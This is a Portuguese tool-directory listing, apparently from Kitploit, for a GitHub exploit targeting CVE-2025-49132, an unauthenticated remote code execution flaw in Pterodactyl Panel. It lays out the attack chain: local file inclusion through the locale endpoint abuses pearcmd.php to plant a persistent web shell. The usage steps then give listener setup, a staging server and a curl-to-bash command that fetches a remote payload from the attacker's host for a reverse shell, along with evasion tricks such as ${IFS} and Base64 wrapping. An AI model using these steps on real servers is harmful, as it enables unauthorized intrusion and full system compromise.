Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-49132-Mods — Exploit automatizado para CVE-2025-49132, uma RCE crítica não autenticada no Painel Pterodactyl. Utiliza LFI via endpoint de localidade para implantar shells web persistentes e obter acesso de shell reverso. | Kitploit
Ferramentas/GitHubGitHub/malw0re/cve-2025-49132-mods
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubmalw0re/cve-2025-49132-mods

CVE-2025-49132-Mods

Exploit automatizado para CVE-2025-49132, uma RCE crítica não autenticada no Painel Pterodactyl. Utiliza LFI via endpoint de localidade para implantar shells web persistentes e obter acesso de shell reverso.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
12249há 6 mesesAinda não revisado
Compartilhar

CVE-2025-49132 - RCE Simples

Python CVE

📝 Visão Geral

Este repositório contém um exploit especializado para CVE-2025-49132, uma vulnerabilidade crítica de Execução Remota de Código (RCE) não autenticada no Pterodactyl Panel (anterior à v1.11.11).

A vulnerabilidade existe no endpoint /locales/locale.json. Ao manipular os parâmetros de consulta locale e namespace, um atacante pode aproveitar uma Inclusão de Arquivo Local (LFI) para interagir com pearcmd.php. Isso permite a criação arbitrária de arquivos e execução de comandos, levando a um comprometimento total do sistema.

⚙️ Cadeia do Exploit

O script ape.py automatiza os seguintes passos:

  • Descoberta do PEAR: Varre a estrutura de diretórios para localizar a instalação do PEAR no alvo.
  • Criação de Backdoor: Usa o config-create do PEAR para escrever um web shell persistente em /tmp/shell.php.

🚀 Instruções de Uso

Para obter um callback bem-sucedido no alvo, siga este fluxo de trabalho:

  1. Preparação Listener: Inicie o Penelope (ou seu listener preferido) em um terminal separado:

penelope -p 4444

Servidor de Staging: Se usar um script shell personalizado, hospede-o via Python: python3 -m http.server 8080

  1. Execução Execute o script em modo interativo para manter o controle sobre o processo de exploração:

python3 ape.py --host xxx.xxx.xxx --interactive

  1. Capturando o Shell Dentro do prompt shell>, use o seguinte comando para executar seu payload preparado:

shell> curl http://<YOUR_IP>:8080/shell.sh | bash

🛡️ Salvaguardas Técnicas

  • Bypass de Espaços: Usa automaticamente ${IFS} para garantir que os payloads sobrevivam ao parsing da URL.
  • Wrapper Base64: Envolve comandos de shell reverso em Base64 para evitar distorção de caracteres pelo servidor Nginx/Web do alvo.
  • Tratamento de Timeout: Projetado para detectar quando um shell reverso se conectou com sucesso, mesmo que a requisição web pare.
Baixar ferramenta